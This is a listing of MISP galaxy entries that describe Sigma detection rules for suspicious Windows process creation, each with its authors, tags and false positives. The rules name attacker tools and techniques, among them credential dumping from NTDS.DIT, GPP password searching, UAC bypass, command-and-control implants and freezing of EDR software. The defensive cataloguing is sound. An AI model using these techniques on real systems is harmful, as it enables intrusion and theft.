tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

New Process Created Via Taskmgr.EXE

Detects the creation of a process via the Windows task manager. This might be an attempt to bypass UAC

Internal MISP references

UUID 3d7679bd-0c00-440c-97b0-3f204273e6c7 which can be used as unique global reference for New Process Created Via Taskmgr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018-03-13
falsepositive ['Administrative activity']
filename proc_creation_win_taskmgr_susp_child_process.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

Potential Fake Instance Of Hxtsr.EXE Executed

HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe

Internal MISP references

UUID 4e762605-34a8-406d-b72e-c1a089313320 which can be used as unique global reference for Potential Fake Instance Of Hxtsr.EXE Executed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020-04-17
falsepositive ['Unknown']
filename proc_creation_win_hxtsr_masquerading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1036']
Related clusters

To see the related clusters, click here.

HackTool - SharPersist Execution

Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms

Internal MISP references

UUID 26488ad0-f9fd-4536-876f-52fea846a2e4 which can be used as unique global reference for HackTool - SharPersist Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-09-15
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpersist.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.execution', 'attack.persistence', 'attack.t1053']
Related clusters

To see the related clusters, click here.

Suspicious RunAs-Like Flag Combination

Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools

Internal MISP references

UUID 50d66fb0-03f8-4da0-8add-84e77d12a020 which can be used as unique global reference for Suspicious RunAs-Like Flag Combination in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-11-11
falsepositive ['Unknown']
filename proc_creation_win_susp_privilege_escalation_cli_patterns.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation']

Suspicious Process Patterns NTDS.DIT Exfil

Detects suspicious process patterns used in NTDS.DIT exfiltration

Internal MISP references

UUID 8bc64091-6875-4881-aaf9-7bd25b5dda08 which can be used as unique global reference for Suspicious Process Patterns NTDS.DIT Exfil in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-03-11
falsepositive ['Unknown']
filename proc_creation_win_susp_ntds.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1003.003']
Related clusters

To see the related clusters, click here.

User Added to Local Administrators Group

Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".

Internal MISP references

UUID ad720b90-25ad-43ff-9b5e-5c841facc8e5 which can be used as unique global reference for User Added to Local Administrators Group in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Administrative activity']
filename proc_creation_win_susp_add_user_local_admin_group.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1098']
Related clusters

To see the related clusters, click here.

Renamed Sysinternals Sdelete Execution

Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)

Internal MISP references

UUID c1d867fe-8d95-4487-aab4-e53f2d339f90 which can be used as unique global reference for Renamed Sysinternals Sdelete Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-09-06
falsepositive ['System administrator usage']
filename proc_creation_win_renamed_sysinternals_sdelete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Usage Of Qemu

Detects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.

Internal MISP references

UUID 5fc297ae-25b6-488a-8f25-cc12ac29b744 which can be used as unique global reference for Potentially Suspicious Usage Of Qemu in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Muhammad Faisal (@faisalusuf), Hunter Juhan (@threatHNTR)
creation_date 2024-06-03
falsepositive ['Unknown']
filename proc_creation_win_qemu_suspicious_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1090', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Abuse of Service Permissions to Hide Services Via Set-Service

Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)

Internal MISP references

UUID 514e4c3a-c77d-4cde-a00f-046425e2301e which can be used as unique global reference for Abuse of Service Permissions to Hide Services Via Set-Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-17
falsepositive ['Rare intended use of hidden services']
filename proc_creation_win_powershell_hide_services_via_set_service.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Proxy Execution Via Wuauclt.EXE

Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution.

Internal MISP references

UUID af77cf95-c469-471c-b6a0-946c685c4798 which can be used as unique global reference for Proxy Execution Via Wuauclt.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team
creation_date 2020-10-12
falsepositive ['Unknown']
filename proc_creation_win_wuauclt_dll_loading.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218', 'attack.execution']
Related clusters

To see the related clusters, click here.

Port Forwarding Activity Via SSH.EXE

Detects port forwarding activity via SSH.exe

Internal MISP references

UUID 327f48c1-a6db-4eb8-875a-f6981f1b0183 which can be used as unique global reference for Port Forwarding Activity Via SSH.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-10-12
falsepositive ['Administrative activity using a remote port forwarding to a local port']
filename proc_creation_win_ssh_port_forward.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.lateral-movement', 'attack.t1572', 'attack.t1021.001', 'attack.t1021.004']
Related clusters

To see the related clusters, click here.

Chopper Webshell Process Pattern

Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells

Internal MISP references

UUID fa3c117a-bc0d-416e-a31b-0c0e80653efb which can be used as unique global reference for Chopper Webshell Process Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), MSTI (query)
creation_date 2022-10-01
falsepositive ['Unknown']
filename proc_creation_win_webshell_chopper.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.discovery', 'attack.t1505.003', 'attack.t1018', 'attack.t1033', 'attack.t1087']
Related clusters

To see the related clusters, click here.

Suspicious SYSTEM User Process Creation

Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)

Internal MISP references

UUID 2617e7ed-adb7-40ba-b0f3-8f9945fe6c09 which can be used as unique global reference for Suspicious SYSTEM User Process Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), David ANDRE (additional keywords)
creation_date 2021-12-20
falsepositive ['Administrative activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_susp_system_user_anomaly.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1134', 'attack.t1003', 'attack.t1027']
Related clusters

To see the related clusters, click here.

New Remote Desktop Connection Initiated Via Mstsc.EXE

Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Internal MISP references

UUID 954f0af7-62dd-418f-b3df-a84bc2c7a774 which can be used as unique global reference for New Remote Desktop Connection Initiated Via Mstsc.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-01-07
falsepositive ['WSL (Windows Sub System For Linux)']
filename proc_creation_win_mstsc_remote_connection.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.t1021.001']
Related clusters

To see the related clusters, click here.

Use of Scriptrunner.exe

The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting

Internal MISP references

UUID 64760eef-87f7-4ed3-93fd-655668ea9420 which can be used as unique global reference for Use of Scriptrunner.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-07-01
falsepositive ['Legitimate use when App-v is deployed']
filename proc_creation_win_lolbin_scriptrunner.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Suspect Svchost Activity

It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.

Internal MISP references

UUID 16c37b52-b141-42a5-a3ea-bbe098444397 which can be used as unique global reference for Suspect Svchost Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author David Burkett, @signalblur
creation_date 2019-12-28
falsepositive ['Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf']
filename proc_creation_win_svchost_execution_with_no_cli_flags.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Suspicious Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

Internal MISP references

UUID 6e22722b-dfb1-4508-a911-49ac840b40f8 which can be used as unique global reference for Suspicious Mstsc.EXE Execution With Local RDP File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-04-18
falsepositive ['Likelihood is related to how often the paths are used in the environment']
filename proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1219.002']
Related clusters

To see the related clusters, click here.

New Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule

Internal MISP references

UUID 322ed9ec-fcab-4f67-9a34-e7c6aef43614 which can be used as unique global reference for New Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
creation_date 2019-01-29
falsepositive ['Legitimate administration activity', 'WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)']
filename proc_creation_win_netsh_port_forwarding.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.defense-evasion', 'attack.command-and-control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Suspicious Rundll32 Invoking Inline VBScript

Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452

Internal MISP references

UUID 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd which can be used as unique global reference for Suspicious Rundll32 Invoking Inline VBScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-03-05
falsepositive ['Unknown']
filename proc_creation_win_rundll32_inline_vbs.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Remote PowerShell Session Host Process (WinRM)

Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).

Internal MISP references

UUID 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8 which can be used as unique global reference for Remote PowerShell Session Host Process (WinRM) in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g
creation_date 2019-09-12
falsepositive ['Legitimate usage of remote Powershell, e.g. for monitoring purposes.']
filename proc_creation_win_winrm_remote_powershell_session_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.lateral-movement', 'attack.t1059.001', 'attack.t1021.006']
Related clusters

To see the related clusters, click here.

HackTool - Empire PowerShell Launch Parameters

Detects suspicious powershell command line parameters used in Empire

Internal MISP references

UUID 79f4ede3-402e-41c8-bc3e-ebbf5f162581 which can be used as unique global reference for HackTool - Empire PowerShell Launch Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-04-20
falsepositive ['Other tools that incidentally use the same command line parameters']
filename proc_creation_win_hktl_empire_powershell_launch.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Terminal Service Process Spawn

Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)

Internal MISP references

UUID 1012f107-b8f1-4271-af30-5aed2de89b39 which can be used as unique global reference for Terminal Service Process Spawn in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-05-22
falsepositive ['Unknown']
filename proc_creation_win_svchost_termserv_proc_spawn.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial-access', 'attack.t1190', 'attack.lateral-movement', 'attack.t1210', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

HackTool - Certipy Execution

Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.

Internal MISP references

UUID 6938366d-8954-4ddc-baff-c830b3ba8fcd which can be used as unique global reference for HackTool - Certipy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Sittikorn Sangrattanapitak
creation_date 2023-04-17
falsepositive ['Unlikely']
filename proc_creation_win_hktl_certipy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential-access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

Suspicious UltraVNC Execution

Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)

Internal MISP references

UUID 871b9555-69ca-4993-99d3-35a59f9f3599 which can be used as unique global reference for Suspicious UltraVNC Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2022-03-04
falsepositive ['Unknown']
filename proc_creation_win_ultravnc_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral-movement', 'attack.g0047', 'attack.t1021.005']
Related clusters

To see the related clusters, click here.

Lolbin Unregmp2.exe Use As Proxy

Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"

Internal MISP references

UUID 727454c0-d851-48b0-8b89-385611ab0704 which can be used as unique global reference for Lolbin Unregmp2.exe Use As Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-12-29
falsepositive ['Unknown']
filename proc_creation_win_lolbin_unregmp2.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Cloudflared Tunnel Execution

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

Internal MISP references

UUID 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 which can be used as unique global reference for Cloudflared Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-17
falsepositive ['Legitimate usage of Cloudflared tunnel.']
filename proc_creation_win_cloudflared_tunnel_run.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1102', 'attack.t1090', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Findstr GPP Passwords

Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.

Internal MISP references

UUID 91a2c315-9ee6-4052-a853-6f6a8238f90d which can be used as unique global reference for Findstr GPP Passwords in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-12-27
falsepositive ['Unknown']
filename proc_creation_win_findstr_gpp_passwords.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential-access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Renamed Remote Utilities RAT (RURAT) Execution

Detects execution of renamed Remote Utilities (RURAT) via Product PE header field

Internal MISP references

UUID 9ef27c24-4903-4192-881a-3adde7ff92a5 which can be used as unique global reference for Renamed Remote Utilities RAT (RURAT) Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-09-19
falsepositive ['Unknown']
filename proc_creation_win_renamed_rurat.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.collection', 'attack.command-and-control', 'attack.discovery', 'attack.s0592']

WhoAmI as Parameter

Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)

Internal MISP references

UUID e9142d84-fbe0-401d-ac50-3e519fb00c89 which can be used as unique global reference for WhoAmI as Parameter in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-11-29
falsepositive ['Unknown']
filename proc_creation_win_susp_whoami_as_param.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Explorer NOUACCHECK Flag

Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks

Internal MISP references

UUID 534f2ef7-e8a2-4433-816d-c91bccde289b which can be used as unique global reference for Explorer NOUACCHECK Flag in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-23
falsepositive ['Domain Controller User Logon', 'Unknown how many legitimate software products use that method']
filename proc_creation_win_explorer_nouaccheck.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.defense-evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

HackTool - Sliver C2 Implant Activity Pattern

Detects process activity patterns as seen being used by Sliver C2 framework implants

Internal MISP references

UUID 42333b2c-b425-441c-b70e-99404a17170f which can be used as unique global reference for HackTool - Sliver C2 Implant Activity Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022-08-25
falsepositive ['Unlikely']
filename proc_creation_win_hktl_sliver_c2_execution_pattern.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Using SettingSyncHost.exe as LOLBin

Detects using SettingSyncHost.exe to run hijacked binary

Internal MISP references

UUID b2ddd389-f676-4ac4-845a-e00781a48e5f which can be used as unique global reference for Using SettingSyncHost.exe as LOLBin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Anton Kutepov, oscd.community
creation_date 2020-02-05
falsepositive ['Unknown']
filename proc_creation_win_lolbin_settingsynchost.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.defense-evasion', 'attack.t1574.008']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell IEX Execution Patterns

Detects suspicious ways to run Invoke-Execution using IEX alias

Internal MISP references

UUID 09576804-7a05-458e-a817-eb718ca91f54 which can be used as unique global reference for Suspicious PowerShell IEX Execution Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-03-24
falsepositive ['Legitimate scripts that use IEX']
filename proc_creation_win_powershell_iex_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious WMIC Execution Via Office Process

Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).

Internal MISP references

UUID e1693bc8-7168-4eab-8718-cdcaa68a1738 which can be used as unique global reference for Suspicious WMIC Execution Via Office Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Vadim Khrykov, Cyb3rEng
creation_date 2021-08-23
falsepositive ['Unknown']
filename proc_creation_win_wmic_susp_execution_via_office_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1204.002', 'attack.t1047', 'attack.t1218.010', 'attack.execution', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Windows Shell/Scripting Processes Spawning Suspicious Programs

Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.

Internal MISP references

UUID 3a6586ad-127a-4d3b-a677-1e6eacdf8fde which can be used as unique global reference for Windows Shell/Scripting Processes Spawning Suspicious Programs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2018-04-06
falsepositive ['Administrative scripts', 'Microsoft SCCM']
filename proc_creation_win_susp_shell_spawn_susp_program.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense-evasion', 'attack.t1059.005', 'attack.t1059.001', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potentially Suspicious WebDAV LNK Execution

Detects possible execution via LNK file accessed on a WebDAV server.

Internal MISP references

UUID 1412aa78-a24c-4abd-83df-767dfb2c5bbe which can be used as unique global reference for Potentially Suspicious WebDAV LNK Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Micah Babinski
creation_date 2023-08-21
falsepositive ['Unknown']
filename proc_creation_win_webdav_lnk_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.t1204']
Related clusters

To see the related clusters, click here.

Msxsl.EXE Execution

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.

Internal MISP references

UUID 9e50a8b3-dd05-4eb8-9153-bdb6b79d50b0 which can be used as unique global reference for Msxsl.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2019-10-21
falsepositive ['Msxsl is not installed by default and is deprecated, so unlikely on most systems.']
filename proc_creation_win_msxsl_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1220']
Related clusters

To see the related clusters, click here.

Wab Execution From Non Default Location

Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity

Internal MISP references

UUID 395907ee-96e5-4666-af2e-2ca91688e151 which can be used as unique global reference for Wab Execution From Non Default Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-12
falsepositive ['Unknown']
filename proc_creation_win_wab_execution_from_non_default_location.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.execution']

New ActiveScriptEventConsumer Created Via Wmic.EXE

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

Internal MISP references

UUID ebef4391-1a81-4761-a40a-1db446c0e625 which can be used as unique global reference for New ActiveScriptEventConsumer Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-06-25
falsepositive ['Legitimate software creating script event consumers']
filename proc_creation_win_wmic_eventconsumer_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Suspicious Process Suspension via WERFaultSecure through EDR-Freeze

Detects attempts to freeze a process likely an EDR or an antimalware service process through EDR-Freeze that abuses the WerFaultSecure.exe process to suspend security software.

Internal MISP references

UUID 1f0b4cac-9c81-41f4-95d0-8475ff46b3e2 which can be used as unique global reference for Suspicious Process Suspension via WERFaultSecure through EDR-Freeze in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jason (https://github.com/0xbcf)
creation_date 2025-09-23
falsepositive ['Legitimate usage of WerFaultSecure for debugging purposes']
filename proc_creation_win_werfaultsecure_process_freeze.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Potential Commandline Obfuscation Using Escape Characters

Detects potential commandline obfuscation using known escape characters

Internal MISP references

UUID f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd which can be used as unique global reference for Potential Commandline Obfuscation Using Escape Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2018-12-11
falsepositive ['Unknown']
filename proc_creation_win_susp_cli_obfuscation_escape_char.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

File Download And Execution Via IEExec.EXE

Detects execution of the IEExec utility to download and execute files

Internal MISP references

UUID 9801abb8-e297-4dbf-9fbd-57dde0e830ad which can be used as unique global reference for File Download And Execution Via IEExec.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-05-16
falsepositive ['Unknown']
filename proc_creation_win_ieexec_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command-and-control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1

Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.

Internal MISP references

UUID 4a30ac0c-b9d6-4e01-b71a-5f851bbf4259 which can be used as unique global reference for Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @Kostastsale, TheDFIRReport
creation_date 2022-12-05
falsepositive ['Unknown']
filename proc_creation_win_susp_emoji_usage_in_cli_1.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Sdclt Child Processes

A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.

Internal MISP references

UUID da2738f2-fadb-4394-afa7-0a0674885afa which can be used as unique global reference for Sdclt Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
creation_date 2020-05-02
falsepositive ['Unknown']
filename proc_creation_win_sdclt_child_process.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths

Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.

Internal MISP references

UUID c74c0390-3e20-41fd-a69a-128f0275a5ea which can be used as unique global reference for Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022-08-05
falsepositive ['Unknown']
filename proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Rundll32 Spawned Via Explorer.EXE

Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.

Internal MISP references

UUID 1723e720-616d-4ddc-ab02-f7e3685a4713 which can be used as unique global reference for Rundll32 Spawned Via Explorer.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author CD_ROM_
creation_date 2022-05-21
falsepositive ['Unknown']
filename proc_creation_win_rundll32_parent_explorer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Suspicious Reg Add BitLocker

Detects suspicious addition to BitLocker related registry keys via the reg.exe utility

Internal MISP references

